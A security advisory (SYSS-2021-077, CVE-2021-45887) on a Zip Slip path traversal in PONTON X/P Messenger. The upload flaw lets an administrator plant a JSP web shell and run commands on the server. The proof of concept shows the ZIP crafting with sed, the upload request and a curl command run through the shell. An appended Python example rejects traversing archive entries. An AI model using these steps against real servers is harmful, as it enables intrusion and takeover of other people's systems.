CVE-2021-45887

An issue was discovered in PONTON X/P Messenger before 3.11.2. Due to path traversal in private/SchemaSetUpload.do for uploaded ZIP files, an executable script can be uploaded by web application administrators, giving the attacker remote code execution on the underlying server via an imgs/*.jsp URI.


Advisory ID: SYSS-2021-077
Product: PONTON X/P Messenger
Manufacturer: PONTON GmbH
Affected Version(s): 3.8.0 (Build 201909201204), 3.10.0 (Build 202009171429)
Tested Version(s): 3.8.0 (Build 201909201204), 3.10.0 (Build 202009171429)
Vulnerability Type: Zip Slip, arbitrary file write through path traversal (CWE-22)
                    Remote code execution through web shell (CWE-434)
Risk Level: Medium
Solution Status: Fixed in release of version 3.11.2
Manufacturer Notification: 2022-01-25
Solution Date: 2022-02-07
Public Disclosure: 2022-03-11
CVE Reference: CVE-2021-45887
Author of Advisory: Stefan Walter, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The manufacturer describes the product as follows (see [1]):

> The PONTON X/P Messenger (or PONTON X/P for short) is PONTON's
> high-quality B2B integration solution with a proven track-record in
> several industries since 2001. PONTON X/P is a highly configurable
> ebXML, AS/1, AS/2, AS/3 and AS/4 compliant messaging software. It
> provides additional features to deal with typical B2B integration
> issues (such as a listener component for the DMZ, certificate
> management and non-repudiation of messages). PONTON X/P is typically
> used as communication layer in a business consortium or as an (OEM)
> communication extension of an existing software application.

Due to a path traversal in uploaded ZIP files, a web shell can be uploaded by web application administrators, giving the attacker remote code execution on the underlying server.

The tested version was not the most recent one. The current versions 4.X were not affected.

The vulnerability can only be exploited by an authenticated user of the Ponton X/P web UI, which is normally only accessible on the internal network.

The vulnerability is fixed with Ponton X/P version 3.11.2. Please upgrade to version 3.11.2.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

Different endpoints of the web application allow uploading of files. The upload functionalities are generally reachable only by users with the role "Configuration Administrator" or "Administrator".

One upload is available at Configuration -> Schemata -> Schema Set Upload. This form accepts a ZIP file and extracts all contents into the local file system under the installation folder at config/Schemata/. By manually modifying the file name entry in the uploaded ZIP file, a path traversal can be exploited (so-called "Zip Slip" attack [2]).

For testing purposes, a local installation was set up using the application binaries provided at [3] and the instructions at [4]:

$ wget 'https://www.ponton.de/downloads/xp/3.10/PontonXP-Messenger-3.10.0-Linux.zip'
$ unzip PontonXP-Messenger-3.10.0-Linux.zip -d PontonXP-Messenger-3.10.0-Linux
$ cd PontonXP-Messenger-3.10.0-Linux
$ ./pontonxp start

Afterwards, the web application is reachable at https://localhost:8443.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following listing shows how a malicious ZIP can be crafted.
$ cat aaaaaaaaaaaaaaaaaa_shell.jsp
<%@ page import="java.util.*,java.io.*"%>
<%
…
$ zip shell.zip aaaaaaaaaaaaaaaaaa_shell.jsp
  adding: aaaaaaaaaaaaaaaaaa_shell.jsp (deflated 45%)
$ sed -i 's|aaaaaaaaaaaaaaaaaa_|../../webroot/imgs/|g' shell.zip

Uploading this file places a JSP web shell into the web application's web root. The resulting request is shown in the following listing (the actual ZIP was omitted due to the binary data it contains):

POST /pontonxp/private/SchemaSetUpload.do HTTP/1.1
Host: localhost:8443
Cookie: SESSIONID8443=node019bxzmhhs2k911xjshmqsrk1tt3.node0; clickedFolder=F890761339%5EF118222018%5E
Content-Type: multipart/form-data; boundary=---------------------------137950995713224342382087625694
Content-Length: 1117
…

-----------------------------137950995713224342382087625694
Content-Disposition: form-data; name="csrfToken"

066d7ed9-de08-4f26-ac08-a0c63167afc6
-----------------------------137950995713224342382087625694
Content-Disposition: form-data; name="schemaSetFile"; filename="shell.zip"
Content-Type: application/zip

…
-----------------------------137950995713224342382087625694
Content-Disposition: form-data; name="ok.x"

31
-----------------------------137950995713224342382087625694
Content-Disposition: form-data; name="ok.y"

2
-----------------------------137950995713224342382087625694--

This shell is then publicly retrievable without authentication at https://localhost:8443/pontonxp/imgs/shell.jsp.
Commands can be executed as follows:

$ curl -k https://localhost:8443/pontonxp/imgs/shell.jsp?5XifdR9vS4d3V=id
uid=1000(demo) gid=1000(demo) groups=1000(demo),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),119(bluetooth),134(scanner),144(kaboxer)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The vulnerability has been fixed with Ponton X/P version 3.11.2.

More information:
https://www.ponton.de/downloads/xp/3.11/documents/ReleaseNotes3112.pdf

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2021-12-06: Vulnerability discovered
2022-01-25: Vulnerability reported to manufacturer
2022-02-07: Fixed version 3.11.2 released by manufacturer
2022-03-11: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for PONTON X/P MESSENGER
    https://www.ponton.de/products/xpmessenger/
[2] Zip Slip vulnerability
    https://snyk.io/research/zip-slip-vulnerability
[3] PONTON X/P MESSENGER 3.10.0 download
    https://ponton.de/downloads/xp/3.10/PontonXP-Messenger-3.10.0-Linux.zip
[4] PONTON X/P MESSENGER 3.10.0 documentation
    https://ponton.de/downloads/xp/3.10/documents/MessengerDocumentation310.pdf
[5] SySS Security Advisory SYSS-2021-077
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-077.txt
[6] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This security vulnerability was found by Stefan Walter of SySS GmbH.

E-Mail: [email protected]
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Stefan_Walter.asc
Key Fingerprint: 74DD 77CD 0317 2777 470D 38BE BE0B B311 DA3F 3E16

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" and without warranty of any kind.
Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
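The defensive check the advisory's Zip Slip finding calls for, added here as a Python example that is neither the advisory's nor PONTON's code: it refuses any uploaded schema-set archive whose entry names would escape the config/Schemata/ target directory before a single file is written. The sample archive, its placeholder file bodies and the output directory are constructed for the example; the entry name mirrors the PoC's ../../webroot/imgs/shell.jsp.

```python
import io
import zipfile
from pathlib import Path, PurePosixPath

# Entry name shaped like the advisory's PoC: relative to config/Schemata/ it lands in the web root.
SLIP_NAME = "../../webroot/imgs/shell.jsp"


def is_safe_entry(name: str, dest) -> bool:
    """True only if `name` lands strictly inside `dest` (lexical check, then resolved-path check)."""
    dest = Path(dest).resolve()
    p = PurePosixPath(name.replace("\\", "/"))  # ZIP names may use either separator
    if p.is_absolute() or ".." in p.parts or (p.parts and ":" in p.parts[0]):
        return False  # absolute path, parent reference or drive letter
    target = dest.joinpath(*p.parts).resolve()
    return target != dest and dest in target.parents


def find_traversal_entries(zip_bytes: bytes, dest) -> list:
    """Names in an uploaded archive that would escape `dest`; an empty list means the upload is clean."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [n for n in zf.namelist() if not is_safe_entry(n, dest)]


def safe_extract(zip_bytes: bytes, dest) -> list:
    """Extract into `dest`, refusing the whole upload if any entry would escape it."""
    dest = Path(dest)
    bad = find_traversal_entries(zip_bytes, dest)
    if bad:
        raise ValueError(f"upload rejected, path traversal in ZIP entries: {bad}")
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.is_dir():
                out = dest.joinpath(*PurePosixPath(info.filename).parts)
                out.parent.mkdir(parents=True, exist_ok=True)
                out.write_bytes(zf.read(info))
                written.append(out.relative_to(dest).as_posix())
    return written


def build_sample_zip(slip: bool) -> bytes:
    """Constructed schema-set upload: one benign XSD, plus the Zip Slip entry when `slip` is True.
    The JSP body is a harmless placeholder, not a shell."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("demo/order.xsd", "<xs:schema/>")
        if slip:
            zf.writestr(SLIP_NAME, "<%-- placeholder --%>")
    return buf.getvalue()
```

Rejecting the whole archive, rather than skipping the offending entry, keeps a partially extracted schema set from ever reaching the server.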
